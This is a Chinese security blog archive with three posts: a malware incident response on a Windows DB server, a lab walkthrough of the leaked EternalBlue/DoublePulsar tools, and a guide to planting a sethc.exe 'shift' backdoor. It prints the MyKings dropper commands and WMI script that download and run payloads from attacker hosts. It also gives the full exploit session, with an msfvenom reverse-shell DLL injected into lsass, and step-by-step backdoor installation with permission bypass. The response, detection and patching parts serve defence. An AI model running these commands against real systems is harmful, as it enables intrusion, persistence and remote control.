标签归档:windows安全

【应急响应】windows应急响应记录20170503

网管同事反应Windows 2008 R2服务器上多了些exe文件,之前没怎么关注过Windows的监控。
这台主机提供了Mssql和Mysql服务,是台DB服务器,当时由于交换机没有口了,所以配置了公网IP,前端没有硬件防火墙,网管只是启用了本机的windows防火墙,过滤了3389等敏感端口,但是445端口对外开放了。

排查过程


检查Mysql,发现有两个版本,一个5.1,一个5.7,且运行权限为System,先排查下是不是通过MYSQL UDF搞的,检查mysql\lib\plugin目录没有发现异常文件
select * from mysql.func没有发现异常。
检查Mssql,运行权限为USER权限,检查了xp_cmdshell等存储过程没有发现异常。
查看系统账户,发现多了一个IUSR_Servs

服务器本身装了诺顿,报警的exe文件都被隔离了

隔离的文件如下

检测病毒文件的几个网站:

https://x.threatbook.cn/
http://www.virscan.org
https://www.virustotal.com/
https://fireeye.ijinshan.com/

上传上去检查结果如下:

http://www.virscan.org

https://x.threatbook.cn/

找到一个txt文件,内容如下:

[down]
http://47.88.216.68:8888/test.dat C:\windows\debug\item.dat 0
http://23.27.127.254:8888/close.bat C:\windows\debug\c.bat 0
[cmd]
新建用户IUSR_Servs并加入到管理员组
net1 user IUSR_Servs ZxcvBMN,.1987&net1 user IUSR_Servs ZxcvBMN,.1987 /ad&net1 localgroup administrators IUSR_Servs /ad&net1 start schedule

net1 user IISUSER_ACCOUNTXX /del&net1 user IUSR_ADMIN /del&net1 user snt0454 /del&taskkill /f /im Logo1_.exe&del c:\windows\Logo1_.exe&taskkill /f /im Update64.exe&del c:\windows\dell\Update64.exe
taskkill /f /im misiai.exe&del misiai.exe&del c:\windows\RichDllt.dll&net1 user asp.net /del&taskkill /f /im winhost.exe&del c:\windows\winhost.exe&del c:\windows\updat.exe
taskkill /f /im netcore.exe&del c:\windows\netcore.exe&taskkill /f /im ygwmgo.exe&del c:\windows\ygwmgo.exe&net1 user aspnet /del&net1 user LOCAL_USER /del&taskkill /f /im Isass.exe&del c:\windows\debug\Isass.exe
添加计划任务
schtasks /create /tn "Mysa" /tr "cmd /c echo open down.mysking.info>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe>>s&echo bye>>s&ftp -s:s&a.exe" /ru "system" /sc onstart /F

添加开机启动项
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "start" /d "regsvr32 /u /s /i:http://js.mykings.top:280/v.sct scrobj.dll" /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "start1" /d "msiexec.exe /i http://js.mykings.top:280/helloworld.msi /q" /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "rundll32" /d "cmd /c if exist c:\windows\debug\item.dat start rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa" /f

echo 123>>1.txt&start C:\windows\debug\c.bat&start rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa
@Wmic Process Where "Name='winlogon.exe' And ExecutablePath='C:\Windows\system\winlogon.exe'" Call Terminate &del C:\Windows\system\winlogon.exe

然后运行taskschd.msc
删除了计划任务Mysa
运行regedit.exe
删除注册表中启动项中的异常内容
运行services.msc
检查注册服务,未发现异常内容
使用Process Explorer检查进程,发现rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa,Kill掉
使用procmon汉化版,观察进程的注册表的读取,文件的浏览,网络行为,进程行为。
查看诺顿日志发现每隔三个小时下载个文件保存到C:\windows\debug\item.dat

但是计划任务中并没有。然后重启了服务器,发现还是每三个小时就会下载这个文件。
检查网络连接netstat -ano | findstr ESTABLIST未发现异常连接。
每三个小时就会下载一次,那就看这个时间点会起什么异常进程,然后发现每三个小时就会启动C:\Windows\System32\wbem\scrcons.exe
想起来这是利用wmi插件来执行定时执行任务,之前碰到过浏览器首页修改后半个小时又自己变回来就是利用的这个,也是scrcons.exe进程会半小时出来一次。
网上给的方法是安装WMITool,但是这台服务器安装报错。
看到网上说使用Autoruns可以看到WMI脚本,果然发现了异常

脚本内容如下:

var toff=3000;
var url1 = "http://wmi.mykings.top:8888/kill.html";
http = new ActiveXObject("Msxml2.ServerXMLHTTP");
fso = new ActiveXObject("Scripting.FilesystemObject");
wsh = new ActiveXObject("WScript.Shell");
http.open("GET", url1, false);
http.send();
str = http.responseText;
arr = str.split("\r\n");
for (i = 0; i < arr.length; i++) {
   t = arr[i].split(" ");
   proc = t[0];
   path = t[1];
   dele = t[2];
   wsh.Run("taskkill /f /im " + proc, 0, true);
   if (dele == 0) {
      try { fso.DeleteFile(path, true); }
      catch (e) {}
   }
};
var locator=new ActiveXObject("WbemScripting.SWbemLocator");
var service=locator.ConnectServer(".","root/cimv2");
var colItems=service.ExecQuery("select * from Win32_Process");
var e=new Enumerator(colItems);
var t1=new Date().valueOf();
for(;!e.atEnd();e.moveNext()){
   var p=e.item();
   if(p.Caption=="rundll32.exe")p.Terminate()
};
var t2=0;
while(t2-t1<toff){
var t2=new Date().valueOf()
}
var pp=service.get("Win32_Process");
var url="http://wmi.mykings.top:8888/test.html",
http=new ActiveXObject("Microsoft.XMLHTTP"),
ado=new ActiveXObject("ADODB.Stream"),
wsh=new ActiveXObject("WScript.Shell");
for(http.open("GET",url,!1),
http.send(),
str=http.responseText,
arr=str.split("\r\n"),
i=0;arr.length>i;i++)t=arr[i].split(" ",3),
http.open("GET",t[0],!1),
http.send(),
ado.Type=1,
ado.Open(),
ado.Write(http.responseBody),
ado.SaveToFile(t[1],2),
ado.Close(),
1==t[2]&&wsh.Run(t[1]);
pp.create("regsvr32 /s shell32.dll");
pp.create("regsvr32 /s WSHom.Ocx");
pp.create("regsvr32 /s scrrun.dll");
pp.create("regsvr32 /s c:\\Progra~1\\Common~1\\System\\Ado\\Msado15.dll");
pp.create("regsvr32 /s jscript.dll");
pp.create("regsvr32 /u /s /i:http://js.mykings.top:280/v.sct scrobj.dll");
pp.create("rundll32.exe c:\\windows\\debug\\item.dat,ServiceMain aaaa");

http://wmi.mykings.top:8888/kill.html
内容如下:

ntvdm.exe C:\*.exe 0 mskns.exe c:\windows\mskns.exe 0 ntuhost.exe c:\windows\ntuhost.exe 0 dwnclear.exe c:\windows\dwnclear.exe 0 isass.exe c:\windows\debug\isass.exe 0 l.exe C:\Windows\zecc\lsm.exe 0 lgnzmq.exe c:\windows\lgnzmq.exe 0 asoaui.exe c:\windows\asoaui.exe 0 kxsjitc.exe C:\Windows\WindowsUpdate\kxsjitc.exe.exe 0 lmudoftzo.exe C:\Windows\WindowsUpdate\lmudoftzo.exe 0 nczkow.exe C:\Windows\WindowsUpdate\nczkow.exe 0 smssc.exe C:\Windows\WindowsUpdate\nczkow.exe 0 ShelReaKet.exe C:\Windows\ShelReaKet.exe 0

http://wmi.mykings.top:8888/test.html

内容如下:

http://47.88.216.68:8888/test.dat C:\windows\debug\item.dat 0

删除该脚本

推荐Windows下辅助查杀的几个工具:

Process Monitor
Process Explorer
Wsyscheck
PC Hunter
autoruns

改进方案


1)windows下的查杀相比Linux复杂一些,windows下还是必须要安装杀毒软件的。
2)将DB改为内网调用,去掉公网IP,将Mysql迁到Linux下并降权。

参考文章


http://www.jb51.net/hack/82851.html
http://jingyan.baidu.com/article/0964eca26f47b38285f536c6.html
http://bbs.kafan.cn/thread-2047183-1-1.html
http://bbs.kafan.cn/thread-2064286-1-1.html

ShadowBroker工具使用测试

事件过程


1. 在2016 年 8 月有一个 “Shadow Brokers” 的黑客组织号称入侵了方程式组织窃取了大量机密文件,并将部分文件公开到了互联网上,方程式(Equation Group)据称是 NSA(美国国家安全局)下属的黑客组织,有着极高的技术手段。这部分被公开的文件包括不少隐蔽的地下的黑客工具。另外 “Shadow Brokers” 还保留了部分文件,打算以公开拍卖的形式出售给出价最高的竞价者,“Shadow Brokers” 预期的价格是 100 万比特币(价值接近5亿美元)。而“Shadow Brokers” 的工具一直没卖出去。
2. 北京时间 2017 年 4 月 8 日,“Shadow Brokers” 公布了保留部分的解压缩密码,有人将其解压缩后的上传到Github网站提供下载。
3. 北京时间 2017 年 4 月 14 日晚,继上一次公开解压密码后,“Shadow Brokers” ,在推特上放出了第二波保留的部分文件,此次发现其中包括新的23个黑客工具。
这些黑客工具被命名为OddJob,EasyBee,EternalRomance,FuzzBunch,EducatedScholar,EskimoRoll,EclipsedWing,EsteemAudit,EnglishMansDentist,MofConfig,ErraticGopher,EmphasisMine,EmeraldThread,EternalSynergy,EwokFrenzy,ZippyBeer,ExplodingCan,DoublePulsar等。

受影响Windows版本


Windows NT,Windows 2000、Windows XP、Windows 2003、Windows Vista、Windows 7、Windows 8,Windows 2008、Windows 2008 R2、Windows Server 2012 SP0

工具下载


1)Python2.6和pywin32安装包(注意都是32位的,不然会导致调用dll payload文件失败)
http://pan.baidu.com/s/1jHKw0AU 密码:kuij
2)Shadowbroker放出的NSA攻击工具
https://github.com/misterch0c/shadowbroker
windows: 包括 Windows利用工具, 植入式的恶意软件 和一些攻击代码
swift: 包括 银行攻击的一些内容
oddjob: 包括与ODDJOB 后门相关的doc
3)中招检查工具
https://github.com/countercept/doublepulsar-detection-script

测试环境


172.16.100.128 Kali
172.16.100.174 Windows 2003 SP2  攻击机
172.16.100.176 Windows XP SP3  靶机(需要关闭防火墙,开启防火墙会拦截445端口)

FUZZBUNCH框架测试


FuzzBunch有点类似于metasploit,并且可跨平台,通过fb.py使用。
首先在C:\shadowbroker\windows下创建目录listeningposts和log_dirs
来到C:\shadowbroker\windows目录下运行fb.py

C:\shadowbroker\windows>python fb.py

--[ Version 3.5.1

[*] Loading Plugins
[*] Initializing Fuzzbunch v3.5.1
[*] Adding Global Variables
[+] Set ResourcesDir => D:\DSZOPSDISK\Resources
[+] Set Color => True
[+] Set ShowHiddenParameters => False
[+] Set NetworkTimeout => 60
[+] Set LogDir => D:\logs
[*] Autorun ON

ImplantConfig Autorun List
==========================

  0) prompt confirm
  1) execute


Exploit Autorun List
====================

  0) apply
  1) touch all
  2) prompt confirm
  3) execute


Special Autorun List
====================

  0) apply
  1) touch all
  2) prompt confirm
  3) execute


Payload Autorun List
====================

  0) apply
  1) prompt confirm
  2) execute


[+] Set FbStorage => C:\shadowbroker\windows\storage

[*] Retargetting Session

[?] Default Target IP Address [] : 172.16.100.176
[?] Default Callback IP Address [] : 172.16.100.174
[?] Use Redirection [yes] : no

[?] Base Log directory [D:\logs] : log_dirs
[*] Checking C:\shadowbroker\windows\log_dirs for projects
Index     Project
-----     -------
0         smb_log_dirs
1         Create a New Project

[?] Project [0] : 1
[?] New Project Name :
[?] Set target log directory to 'C:\shadowbroker\windows\log_dirs\z172.16.100.17
6'? [Yes] :

[*] Initializing Global State
[+] Set TargetIp => 172.16.100.176
[+] Set CallbackIp => 172.16.100.174

[!] Redirection OFF
[+] Set LogDir => C:\shadowbroker\windows\log_dirs\z172.16.100.176

Module: Global Variables
========================

Name                    Value
----                    -----
ResourcesDir            D:\DSZOPSDISK\Resources
Color                   True
ShowHiddenParameters    False
FbStorage               C:\shadowbroker\windows\storage
LogDir                  C:\shadowbroker\windows\log_dirs\z172.16.100.176
TargetIp                172.16.100.176
CallbackIp              172.16.100.174
TmpDir                  C:\shadowbroker\windows\log_dirs\z172.16.100.176
NetworkTimeout          60

其中Target IP为靶机IP,Callback IP为运行fb.py的攻击机IP。
use命令的用途是选择插件,如下所列:

fb > use
Architouch           Esteemaudit          Printjoblist
Darkpulsar           Esteemaudittouch     Processlist
Domaintouch          Eternalblue          Regdelete
Doublepulsar         Eternalchampion      Regenum
Easybee              Eternalromance       Regread
Easypi               Eternalsynergy       Regwrite
Eclipsedwing         Ewokfrenzy           Rpcproxy
Eclipsedwingtouch    Explodingcan         Rpctouch
Educatedscholar      Explodingcantouch    Smbdelete
Educatedscholartouch Iistouch             Smblist
Emeraldthread        Jobadd               Smbread
Emeraldthreadtouch   Jobdelete            Smbtouch
Emphasismine         Joblist              Smbwrite
Englishmansdentist   Mofconfig            Webadmintouch
Erraticgopher        Namedpipetouch       Worldclienttouch
Erraticgophertouch   Pcdlllauncher        Zippybeer
Eskimoroll           Printjobdelete

插件被分解成几类:
目标识别和利用漏洞发现:Architouch,Rpctouch,Domaintouch,Smbtouch等。;
漏洞利用:EternalBlue,Emeraldthread,Eclipsedwing,EternalRomance等。;
目标攻击后后操作:Douplepulsar,Regread,Regwrite等。
然后我们通过使用Smbtouch使用smb协议来检测对方操作系统版本、架构、可利用的漏洞。

fb > use Smbtouch

[!] Entering Plugin Context :: Smbtouch
[*] Applying Global Variables
[+] Set NetworkTimeout => 60
[+] Set TargetIp => 172.16.100.176
fb Touch (Smbtouch) > execute

[!] Preparing to Execute Smbtouch
[*] Redirection OFF

[+] Configure Plugin Local Tunnels

[+] Configure Plugin Remote Tunnels


Module: Smbtouch
================

Name                    Value
----                    -----
NetworkTimeout          60
TargetIp                172.16.100.176
TargetPort              445
RedirectedTargetIp
RedirectedTargetPort
UsingNbt                False
Pipe
Share
Protocol                SMB
Credentials             Anonymous

[?] Execute Plugin? [Yes] :
[*] Executing Plugin
[+] SMB Touch started

[*] TargetIp              172.16.100.176
[*] TargetPort            445
[*] RedirectedTargetIp    (null)
[*] RedirectedTargetPort  0
[*] NetworkTimeout        60
[*] Protocol              SMB
[*] Credentials           Anonymous

[*] Connecting to target...
        [+] Initiated SMB connection

[+] Target OS Version 5.1 build 2600
    Windows 5.1

[!] Target could be either SP2 or SP3,
[!] for these SMB exploits they are equivalent

[*] Trying pipes...
        [+] spoolss    - Success!

[+] Target is 32-bit

[Not Supported]
        ETERNALSYNERGY  - Target OS version not supported

[Vulnerable]
        ETERNALBLUE     - DANE
        ETERNALROMANCE  - FB
        ETERNALCHAMPION - DANE/FB

[*] Writing output parameters

[+] Target is vulnerable to 3 exploits
[+] Touch completed successfully

[+] Smbtouch Succeeded

目标系统似乎有三个漏洞可以利用(EternalBlue,EternalRomance和EternalChampion),看网上的测试都是利用的EternalBlue,我们来试一下

fb Touch (Smbtouch) > use eternalblue

[!] Entering Plugin Context :: Eternalblue
[*] Applying Global Variables
[+] Set NetworkTimeout => 60
[+] Set TargetIp => 172.16.100.176

[*] Applying Session Parameters
[-] Error: Invalid value for Target (XP_SP2SP3_X86)
[-] Skipping 'Target'
[*] Running Exploit Touches


[!] Enter Prompt Mode :: Eternalblue

Module: Eternalblue
===================

Name                  Value
----                  -----
NetworkTimeout        60
TargetIp              172.16.100.176
TargetPort            445
VerifyTarget          True
VerifyBackdoor        True
MaxExploitAttempts    3
GroomAllocations      12
Target                WIN72K8R2

[!] plugin variables are valid
[?] Prompt For Variable Settings? [Yes] :

[*]  NetworkTimeout :: Timeout for blocking network calls (in seconds). Use -1 f
or no timeout.

[?] NetworkTimeout [60] :

[*]  TargetIp :: Target IP Address

[?] TargetIp [172.16.100.176] :

[*]  TargetPort :: Port used by the SMB service for exploit connection

[?] TargetPort [445] :

[*]  VerifyTarget :: Validate the SMB string from target against the target sele
cted before exploitation.

[?] VerifyTarget [True] :

[*]  VerifyBackdoor :: Validate the presence of the DOUBLE PULSAR backdoor befor
e throwing. This option must be enabled for multiple exploit attempts.

[?] VerifyBackdoor [True] :

[*]  MaxExploitAttempts :: Number of times to attempt the exploit and groom. Dis
abled for XP/2K3.

[?] MaxExploitAttempts [3] :

[*]  GroomAllocations :: Number of large SMBv2 buffers (Vista+) or SessionSetup
allocations (XK/2K3) to do.

[?] GroomAllocations [12] :

[*]  Target :: Operating System, Service Pack, and Architecture of target OS

    0) XP            Windows XP 32-Bit All Service Packs
   *1) WIN72K8R2     Windows 7 and 2008 R2 32-Bit and 64-Bit All Service Packs

[?] Target [1] : 0
[+] Set Target => XP


[!] Preparing to Execute Eternalblue

[*]  Mode :: Delivery mechanism

   *0) DANE     Forward deployment via DARINGNEOPHYTE
    1) FB       Traditional deployment from within FUZZBUNCH

[?] Mode [0] : 1
[+] Run Mode: FB

[?] This will execute locally like traditional Fuzzbunch plugins. Are you sure?
(y/n) [Yes] :
[*] Redirection OFF

[+] Configure Plugin Local Tunnels
[+] Local Tunnel - local-tunnel-1
[?] Destination IP [172.16.100.176] :
[?] Destination Port [445] :
[+] (TCP) Local 172.16.100.176:445

[+] Configure Plugin Remote Tunnels


Module: Eternalblue
===================

Name                  Value
----                  -----
DaveProxyPort         0
NetworkTimeout        60
TargetIp              172.16.100.176
TargetPort            445
VerifyTarget          True
VerifyBackdoor        True
MaxExploitAttempts    3
GroomAllocations      12
ShellcodeBuffer
Target                XP

[?] Execute Plugin? [Yes] :
[*] Executing Plugin
[*] Connecting to target for exploitation.
    [+] Connection established for exploitation.
[*] Pinging backdoor...
    [+] Backdoor not installed, game on.
[*] Forcing MaxExploitAttempts to 1.
[*] Target OS selected valid for OS indicated by SMB reply
[*] CORE raw buffer dump (12 bytes):
0x00000000  57 69 6e 64 6f 77 73 20 35 2e 31 00              Windows 5.1.
[*] Fingerprinting SMB non-paged pool quota
    [+] Allocation total: 0xfff4
    [+] Spray size: 0
    [+] Allocation total: 0x1ffe8
    [+] Spray size: 1
    [+] Allocation total: 0x2ffdc
    [+] Spray size: 2
    [+] Allocation total: 0x3ffd0
    [+] Spray size: 3
    [+] Allocation total: 0x4ffc4
    [+] Spray size: 4
    [+] Allocation total: 0x5ffb8
    [+] Spray size: 5
    [+] Allocation total: 0x6ffac
    [+] Spray size: 6
    [+] Allocation total: 0x7ffa0
    [+] Spray size: 7
    [+] Allocation total: 0x8ff94
    [+] Spray size: 8
    [+] Allocation total: 0x9ff88
    [+] Spray size: 9
    [+] Allocation total: 0xaff7c
    [+] Spray size: 10
    [+] Allocation total: 0xbff70
    [+] Spray size: 11
    [+] Quota NOT exceeded after 12 packets
    [+] Allocation total: 0xbff70
[*] Building exploit buffer
[*] Sending all but last fragment of exploit packet
    ................DONE.
[*] Sending SMB Echo request
[*] Good reply from SMB Echo request
[*] Starting non-paged pool grooming
    [+] Sending 2 non-paged pool fragment packets
        ....DONE.
    [+] Sent 2 non-paged pool fragment packets ofsize 0x00006FF9
    [+] Sending 10 non-paged pool grooming packets
        ..........DONE.
    [+] Sent 10 non-paged pool grooming packets - groom complete
[*] Sending SMB Echo request
[*] Good reply from SMB Echo request
[*] Sending last fragment of exploit packet!
    DONE.
[*] Receiving response from exploit packet
    [+] ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] Triggering free of corrupted buffer.
[*] Pinging backdoor...
    [+] Backdoor returned code: 10 - Success!
    [+] Ping returned Target architecture: x86 (32-bit)
    [+] Backdoor installed
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] CORE sent serialized output blob (2 bytes):
0x00000000  08 00                                            ..
[*] Received output parameters from CORE
[+] CORE terminated with status code 0x00000000
[+] Eternalblue Succeeded

攻击成功之后并不能直接执行命令,需要用框架的其他的插件配合。可以使用DoublePulsar插件,DoublePulsar类似于一个注入器,有以下几个功能。
Ping: 检测后门是否部署成功
RUNDLL:注入dll。
RunShellcode:注入shellcode
Uninstall:用于卸载系统上的后门
测试使用RUNDLL来注入之前msf生成的dll到目标系统
使用msf生成DLL

root@kali-vincent:/tmp# msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.100.128 LPORT=2345 -f dll > s.dll
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 299 bytes

然后msf开启监听

 # msfconsole
msf > use exploit/multi/handler
msf > set LHOST 172.16.100.128
msf > set LPORT 2345
msf > set PAYLOAD windows/meterpreter/reverse_tcp
msf > exploit

fb Payload (Doublepulsar) > use DoublePulsar

[!] Entering Plugin Context :: Doublepulsar
[*] Applying Global Variables
[+] Set NetworkTimeout => 60
[+] Set TargetIp => 172.16.100.176

[*] Applying Session Parameters
[-] Error: Invalid value for Function ()
[-] Skipping 'Function'

[!] Enter Prompt Mode :: Doublepulsar

Module: Doublepulsar
====================

Name                  Value
----                  -----
NetworkTimeout        60
TargetIp              172.16.100.176
TargetPort            445
DllPayload            C:\s.dll
DllOrdinal            1
ProcessName           lsass.exe
ProcessCommandLine
Protocol              SMB
Architecture          x86
Function              RunDLL

[!] plugin variables are valid
[?] Prompt For Variable Settings? [Yes] :

[*]  NetworkTimeout :: Timeout for blocking network calls (in seconds).  Use -1
for no timeout.

[?] NetworkTimeout [60] :

[*]  TargetIp :: Target IP Address

[?] TargetIp [172.16.100.176] :

[*]  TargetPort :: Port used by the Double Pulsar back door

[?] TargetPort [445] :

[*]  Protocol :: Protocol for the backdoor to speak

   *0) SMB     Ring 0 SMB (TCP 445) backdoor
    1) RDP     Ring 0 RDP (TCP 3389) backdoor

[?] Protocol [0] :

[*]  Architecture :: Architecture of the target OS

   *0) x86     x86 32-bits
    1) x64     x64 64-bits

[?] Architecture [0] :

[*]  Function :: Operation for backdoor to perform

    0) OutputInstall     Only output the install shellcode to a binary file on d
isk.
    1) Ping              Test for presence of backdoor
   *2) RunDLL            Use an APC to inject a DLL into a user mode process.
    3) RunShellcode      Run raw shellcode
    4) Uninstall         Remove's backdoor from system

[?] Function [2] : 2

[*]  DllPayload :: DLL to inject into user mode

[?] DllPayload [C:\s.dll] : C:\s.dll

[*]  DllOrdinal :: The exported ordinal number of the DLL being injected to call


[?] DllOrdinal [1] :

[*]  ProcessName :: Name of process to inject into

[?] ProcessName [lsass.exe] :

[*]  ProcessCommandLine :: Command line of process to inject into

[?] ProcessCommandLine [] :


[!] Preparing to Execute Doublepulsar
[*] Redirection OFF

[+] Configure Plugin Local Tunnels
[+] Local Tunnel - local-tunnel-1
[?] Destination IP [172.16.100.176] :
[?] Destination Port [445] :
[+] (TCP) Local 172.16.100.176:445

[+] Configure Plugin Remote Tunnels


Module: Doublepulsar
====================

Name                  Value
----                  -----
NetworkTimeout        60
TargetIp              172.16.100.176
TargetPort            445
DllPayload            C:\s.dll
DllOrdinal            1
ProcessName           lsass.exe
ProcessCommandLine
Protocol              SMB
Architecture          x86
Function              RunDLL

[?] Execute Plugin? [Yes] :
[*] Executing Plugin
[+] Selected Protocol SMB
[.] Connecting to target...
[+] Connected to target, pinging backdoor...
        [+] Backdoor returned code: 10 - Success!
        [+] Ping returned Target architecture: x86 (32-bit) - XOR Key: 0x0372FB2
5
    SMB Connection string is: Windows 5.1
    Target OS is: XP x86
        [+] Backdoor installed
        [+] DLL built
        [.] Sending shellcode to inject DLL
        [+] Backdoor returned code: 10 - Success!
        [+] Backdoor returned code: 10 - Success!
        [+] Backdoor returned code: 10 - Success!
        [+] Command completed successfully
[+] Doublepulsar Succeeded

反弹获得meterpeter

meterpreter > sysinfo
Computer        : VINCENT-3B49409
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : zh_CN
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/win32
meterpreter > shell
Process 344 created.
Channel 1 created.
Microsoft Windows XP [版本 5.1.2600]
(C) 版权所有 1985-2001 Microsoft Corp.

MSF


https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/smb/smb_ms17_010.rb
拷贝到/usr/share/metasploit-framework/modules/auxiliary/scanner/smb

msf > use auxiliary/scanner/smb/smb_ms17_010
msf auxiliary(smb_ms17_010) > set rhosts 172.16.100.176
rhosts => 172.16.100.176
msf auxiliary(smb_ms17_010) > exploit 
[*] 172.16.100.176:445 - Connected to \\172.16.100.176\IPC$ with TID = 2048
[*] 172.16.100.176:445 - Received STATUS_INSUFF_SERVER_RESOURCES with FID = 0
[!] 172.16.100.176:445 - Host is likely VULNERABLE to MS17-010!
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Nmap


smb-vuln-ms17-010检测脚本:
https://github.com/cldrn/nmap-nse-scripts/blob/master/scripts/smb-vuln-ms17-010.nse

root@kali:/usr/share/nmap/scripts# nmap -p 445 --script=smb-vuln-ms17-010 192.168.190.46

Starting Nmap 7.40 ( https://nmap.org ) at 2017-05-27 11:41 CST
Nmap scan report for 192.168.190.46
Host is up (0.00054s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds

Host script results:
| smb-vuln-ms17-010: 
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
| 
| Disclosure date: 2017-03-14
| References:
| https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
| https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143

Nmap done: 1 IP address (1 host up) scanned in 0.27 seconds

中招检测


需要有Python环境,需要安装argparse包

C:\doublepulsar-detection-script-master>python detect_doublepulsar.py --ip 172.16.100.176
[+] [172.16.100.176] DOUBLEPULSAR DETECTED!!!

修复方案


1)升级到微软提供支持的Windows版本,并安装最新补丁,配置自动更新。
2)无补丁的版本如Windows 2003 和 Windows XP关闭135、137、139、445端口,对于 3389 远程登录,如果不想关闭的话,至少要关闭智能卡登录功能。
3)安装杀毒软件

参考文章


http://bobao.360.cn/news/detail/4118.html
http://bobao.360.cn/learning/detail/3743.html
http://www.freebuf.com/sectool/132076.html
http://bobao.360.cn/news/detail/4119.html

Windows服务器安装shift后门

Windows2003


通过远程桌面连接工具连接到Windows远程桌面,在没有输入用户名和密码前,连接按5次Shift键,可以调用c:\windows\system32\sethc.exe,所以需要把c:\windows\system32\sethc.exe替换成其他的执行程序。
例如这里我调用资源管理器,安装方式如下:

copy c:\windows\explorer.exe c:\windows\system32\sethc.exe /y
copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe /y
attrib c:\windows\system32\sethc.exe +h
attrib c:\windows\system32\dllcache\sethc.exe +h

其中attrib +h是添加隐藏属性

 

Windows2008


windows 2008中对于权限设置的比较严格,例如我们通过xp_cmdshell直接替换sethc.exe是没有权限的。如图所示:

exec xp_cmdshell 'copy c:\windows\system32\cmd.exe c:\windows\system32\sethc.exe /y'

将权限目录下的所有文件及文件夹、子文件夹下的所有者更改为管理员组(administrators)命令

exec xp_cmdshell 'takeown /f c:\windows\system32\sethc.* /a /r /d y'

赋予SYSTEM完全控制权限
cacls c:\windows\system32\sethc.exe /T /E /G system:F

然后就可以复制了

通过shift后门调出DOS窗口

不过windows 2008下如果是用explorer.exe替换无法调用出资源管理窗口。